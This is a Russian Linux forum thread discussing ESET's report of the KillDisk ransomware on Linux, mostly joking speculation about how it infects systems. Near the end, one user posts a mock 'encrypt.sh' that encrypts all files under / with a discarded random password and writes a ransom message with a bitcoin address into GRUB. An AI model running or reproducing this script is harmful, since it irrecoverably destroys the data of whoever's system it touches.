LINUX.ORG.RU
ФорумTalks

Ребята из ESET видели живой шифровальщик под линь!


0

2

https://www.nixp.ru/news/13906.html

В случае Linux-платформы троян KillDisk обходит основные каталоги корневой директории (включая /home, /root, /boot, /etc, /usr и т.д.), делая это рекурсивно с глубиной до 17 подкаталогов. После ребута инфицированная ОС не загружается, а требование о выкупе выводится прямо в меню загрузчика GRUB. Исследователи ESET утверждают, что формально «восстановление зашифрованных файлов невозможно даже в случае уплаты выкупа», объясняя это тем, что «ключи шифрования нигде не сохраняются, после перезагрузки зараженной системы жертва теряет свои данные безвозвратно». Однако одновременно сообщается, что в шифровании, которое используется в Linux, есть уязвимость, которая «делает восстановление возможным, хотя и достаточно сложным».

О том, как KillDisk заражает Linux-компьютеры, в сообщении ESET не уточняется. В новости о прошлой модификации вируса (для Windows) заявлялось, что «для заражения компьютеров жертв хакеры используют фишинговые электронные письма с документами Excel, которые содержат вредоносные макросы». Но такой способ вряд ли применим к случаю с Linux-системами.

Самую мякотку - как оно проникает в систему они еще не видели, толи кочились грибы, толи опять все надо компилять и запускать. Ну или это просто питоно-скрипт над opessl.

Deleted

Последнее исправление: Deleted (всего исправлений: 1)

222 btc, ага. нужна ссылка на гитхаб

tcler
()
Последнее исправление: tcler (всего исправлений: 1)

с глубиной до 17 подкаталогов

Вот блин, век живи - век учись. Даже не знал, что есть такая опция.

abraziv_whiskey ★★★★★
()

О том, как KillDisk заражает Linux-компьютеры, в сообщении ESET не уточняется

скучающие задроты сами запускают после трех дней секса с зависимостями и версией компилятора

и прям в комментах доказательство:

По делу: опять полу-отчёт. Где скачать, как собрать, почему нет ссылки на гитхаб

upcFrost ★★★★★
()
Последнее исправление: upcFrost (всего исправлений: 1)

О том, как KillDisk заражает Linux-компьютеры, в сообщении ESET не уточняется.

Предположу, что распространяется в виде юнитов system-d.

Lavos ★★★★★
()

Самую мякотку - как оно проникает в систему они еще не видели

Дык, этот функционал они ещё не дописали просто.

DawnCaster ★★
()

толи опять все надо компилять и запускать

бинарник на go? ну да тяжеловат, но сейчас такие каналы.

Deleted
()

требование о выкупе выводится прямо в меню загрузчика GRUB

А если GRUB нет? Ведь и такое может быть. Куда отправлять багрепорт?

sudopacman ★★★★★
()

А в чем проблема? Вполне давно бегают в диком мире.

fornlr ★★★★★
()
Ответ на: комментарий от Lavos

Обожаю твои высеры про сисьдэ! Очень поднимает настроение и укрепляет мнение о ненужности этой поделки потного. Жги естчо! Я твой фанат.

deep-purple ★★★★★
()

Eset скоро пролетит в гос учреждениях ибо не сертефецировано. Надо о себе напоминать хотябы 1%

Venediktov
()

делая это рекурсивно с глубиной до 17 подкаталогов.

18 подкаталог — наше спасение! :)

quickquest ★★★★★
()

а попасть в компьютер могут запросто.

у меня стала опера падать на всяком видео и тяжелом флэше /хтмл5.
Сперва думал памяти капец, ан нет.
И на штеуде, и на АМД, и под Винь и под Линь симптомы - «недостаточно памяти для отображения страницы», если вкладку закрыть, то она еще проживет пару минут, но потом перезапускается.

Deleted
()

Самую мякотку - как оно проникает в систему они еще не видели

Тебе ссылку на список CVE дать, или сам найдешь?

Deleted
()
Ответ на: комментарий от Deleted

т.е. под win они хакают мозги пользователю, а под линукс оскорбляют пользователя тем что игнорируют его?

Deleted
()
Ответ на: комментарий от orm-i-auga

Очевидно что в цифрах 17 и 222 зашифровано послание для знающих.

Deleted
()

толи опять все надо компилять и запускат

Ага, еще дебажить и баги править.

mandala ★★★★★
()

Исследователи ESET утверждают, что формально «восстановление зашифрованных файлов невозможно даже в случае уплаты выкупа»,

Они платили? Пейсатели зловредов иногда удивляют тех.выкрутасами.

mandala ★★★★★
()
Ответ на: комментарий от unt1tled

что в шифровании, которое используется в Linux

Нет, они говорят что «и без ключей в этом нашем ляликсе-студ.поделке можно всё расшифровать».

mandala ★★★★★
()

Одно из объяснений того, что они не описали механизм проникновения в систему: ESET сами написали этот быдлокод.

Quasar ★★★★★
()
Ответ на: комментарий от Deleted

Они даже хром испаганили, ну что за люди...

mandala ★★★★★
()

ужас. вирус от юзера шифрует /root
Пойду, предупрежу пацанов.
П.С. сэр, вы зачем сюда всякую желтуху тащите?

darkenshvein ★★★★★
()
Ответ на: комментарий от Quasar

Самый простой: это заставить пользователя запустить бинарник. Привилегии можно и повысить.

mandala ★★★★★
()
Ответ на: комментарий от Venediktov

А чего заканчивать.
J Обыкновенный контент от лайвлика до ютуба, реально там рейтинг +16, не более. И с ней что-то случается такое, она отжирает какую-то память, притормаживает и Ooops!

Deleted
()
Последнее исправление: RTP (всего исправлений: 1)
Ответ на: комментарий от darkenshvein

в ведре мало локальных уязвимостей?
а как насчет дистров от васянов и всяких крякальщиков эфира соседского вай-вай?

Deleted
()
Ответ на: комментарий от upcFrost

а когда ссылку на репу дадут, будут ворчать, что лицензия не та

der_looser ★★
()
Ответ на: комментарий от orm-i-auga

Справедливости ради, посмотрел сейчас, максимальная вложенность 22.

orm-i-auga ★★★★★
()
Ответ на: комментарий от heilkitty

Ага. Всё в духе OSS, видимо. Вирус надо форкнуть на гитхабе, дописать установщик, и самому сделать пакеты для популярных дистрибутивов.

DawnCaster ★★
()

А как он умудряется прописаться в груб без рута? Проще же тупо хомяк зашифровать и рядом текстовый файл положить.

DNA_Seq ★★☆☆☆
()
Ответ на: комментарий от Deleted

память утекшая из оперы будет захваченна ядром, которое обнаружит и запустит в ей вирус?

Deleted
()
Ответ на: комментарий от Deleted

не, ну блин, вы тут определяйтесь, кто тут я на лоре крякер :)

То у них переполнение буфера в ведрах, с эскалацией привилегий, то нифига от текущей памяти не бывает... Я то с дивана про память утекающую в ведро ляпаю, а там хз с какого перепугу опера крашится с мессагой о нехватки памяти.

Deleted
()

делая это рекурсивно с глубиной до 17 подкаталогов

А сразу основной каталог не варик жифрауть?

Siado ★★★★★
()
Ответ на: комментарий от darkenshvein

вирус от юзера зашифрует /home/username. То есть единственное то, что представляет ценность.

cvs-255 ★★★★★
()

ну способы проникновения есть, некоторые же копипастят бездумно конфиги для коньков, ставят экстеншоны какие-то в гнум и плазмоиды в кде

kott ★★★★★
()

и даже запускают непонятный код на перле с форумов из-под рута :)

kott ★★★★★
()

О, смотрите, исходники нашел.

## encrypt.sh
#
#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation, either version 3 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License
#    along with this program.  If not, see <http://www.gnu.org/licenses/>.

pass=$(pwgen | head)
cd /
find -type f -maxdepth 17 -exec openssl enc -aes-256-cbc -salt -in '{}' -out '{}' -k "$pass" \;
echo -e "menuentry \"send your money to btc 1PC9aZC4hNX2rmmrt7uHTfYAS3hRbph4UN to get decrypt.sh\" {}" >> /etc/grub.d/40_custom
update-grub
Davidov ★★★★
()
Последнее исправление: Davidov (всего исправлений: 2)

А нефиг левые репы подключать. Кстати, никто не в курсе, чо это RetroArch перестал под линух стабильные релизы делать?

TooPar
()
Последнее исправление: TooPar (всего исправлений: 1)
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.